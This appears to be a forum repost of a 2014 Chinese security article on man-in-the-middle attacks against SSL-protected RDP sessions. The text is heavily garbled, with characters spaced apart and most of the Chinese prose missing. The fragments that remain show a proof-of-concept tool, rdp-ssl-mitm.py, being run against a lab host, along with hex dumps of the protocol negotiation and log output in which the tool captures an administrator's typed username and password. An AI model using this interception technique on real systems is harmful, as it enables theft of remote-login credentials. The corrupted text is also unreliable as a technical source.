[7890] 2014-03-20_基于RDP的SSL中间人攻击

文档创建者:s7ckTeam
浏览次数:3
最后更新:2025-01-17
2014-03-20_基于RDP的SSL中间人攻击 R D P S S L F r e e B u f   2 0 1 4 - 0 3 - 2 0   T a s k i l l e r R D P S S L R D P ( M i T M ) R D P R D P -   R D P R D P S e c u r i t y   L a y e r -   S S L ( T L S   1 . 0 ) -     C r e d S S P   ( S S L   w i t h   N L A ) S S L T L S   1 . 0 S S L N L A R D P 使 N e g o t i a t e 使 S S L S S L
S S L S S L 1 .   使 P o C r d p - s s l - m i t m . p y R D P 2 .   使 R D P 使 使 S S L 3 .   使 S S L S S L R D P S S L 使 访 R D P 4 .   R D P S S L R D P S S L R D P 1 使 使 使 R D P A R P D N S 便 R D P 使 1 9 2 . 1 6 8 . 1 9 0 . 1 7 0 P o C R D P 1 9 2 . 1 6 8 . 2 . 9 6 $   . / r d p - s s l - m i t m . p y   - r 1 9 2 . 1 6 8 . 2 . 9 6 : 3 3 8 9 [ + ]   L i s t e n i n g   f o r c o n n e c t i o n s   o n   0 . 0 . 0 . 0 : 3 3 8 9 I P R D P 1 9 2 . 1 6 8 . 1 9 0 . 1
I P A R P 2 R D P 使 使 S S L S S L R D P M e s s a g e   # 1 :   C l i e n t   > M i T M   >   S e r v e r 0 3   0 0   0 0   1 3   0 e   e 0   0 0   0 0   0 0   0 0   0 0   0 1   0 0   0 8 0 0   * 0 3 * 0 0   0 0   0 0 * 0 3 * R D P S S L C r e d S S P M e s s a g e   # 2 :   S e r v e r   > M i T M   >   C l i e n t 0 3   0 0   0 0   1 3   0 e   d 0   0 0   0 0   1 2   3 4   0 0   0 2   0 0   0 8 0 0   * 0 1 * 0 0   0 0   0 0 使 * 0 1 * 使 S S L * 0 2 * C r e d S S P C r e d S S P * 0 2 * S S L C r e d S S P 3 R D P S S L M e s s a g e   # 3 :   C l i e n t   > M i T M S S L S S L * 1 6   0 3 0 1 * 0 3   0 1 S S L 使 S S L   3 . 1 A K A T L S   1 . 0 * 1 6   0 3   0 1 *   0 0   5 a   0 1   0 0   0 0   5 6   0 3   0 1   5 2   2 1   a c b e   6 3 2 0   c e   d e   4 b   a 5   9 0   1 8   f 0   6 6   9 7   e e   9 d   5 4   1 4 e 3   1 c . . .   s n i p   . . . S S L 使 S S L R D P m s t s c S S L
P o C 使 使 S S L 使 4 R D P S S L R D P S S L R D P 4 p 4 4   0 4   0 0   1 9 4 4   0 4   0 1   1 9 0 0 0 1 s c a n c o d e 0 × 1 9 p 使 使 P o C Q W E R T Y 使 U K / U S C A P S L o c k S H I F T P o C A d m i n i s t r a t o r P a s s w o r d $   . / r d p - s s l - m i t m . p y   - r   1 9 2 . 1 6 8 . 2 . 9 6 : 3 3 8 9 [ + ]   L i s t e n i n g   f o r   c o n n e c t i o n s   o n 0 . 0 . 0 . 0 : 3 3 8 9 [ + ]   I n c o m i n g   c o n n e c t i o n   f r o m 1 9 2 . 1 6 8 . 1 9 0 . 1 : 6 0 3 7 0
[ + ]   N e w   o u t g o i n g   r e q u e s t   t o 1 9 2 . 1 6 8 . 2 . 9 6 : 3 3 8 9   ( S S L :   0 ) [ + ]   C o n n e c t e d [ + ]   D e t e c t e d   i n c o m i n g   S S L   c o n n e c t i o n . T u r n i n g   s e l f   i n t o   S S L   s o c k e t [ + ]   I n c o m i n g   c o n n e c t i o n   f r o m 1 9 2 . 1 6 8 . 1 9 0 . 1 : 6 0 3 7 4 [ + ]   N e w   o u t g o i n g   r e q u e s t   t o 1 9 2 . 1 6 8 . 2 . 9 6 : 3 3 8 9   ( S S L :   0 ) [ + ]   C o n n e c t e d [ + ]   D e t e c t e d   i n c o m i n g   S S L   c o n n e c t i o n . T u r n i n g   s e l f   i n t o   S S L   s o c k e t < L S h i f t - d o w n > A < L S h i f t - u p > D M I N I S T R A T O R < T a b > < L S h i f t - d o w n > P < L S h i f t - u p > A S S W O R D < E n t e r > R D P S S L H T T P S 使 R D P S S L N L A 使 N L A R D P R D P 使 S S L R D P A t t a c k i n g   t h e   R D P   C l i e n t s [ v i a   p o r t c u l l i s ]
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则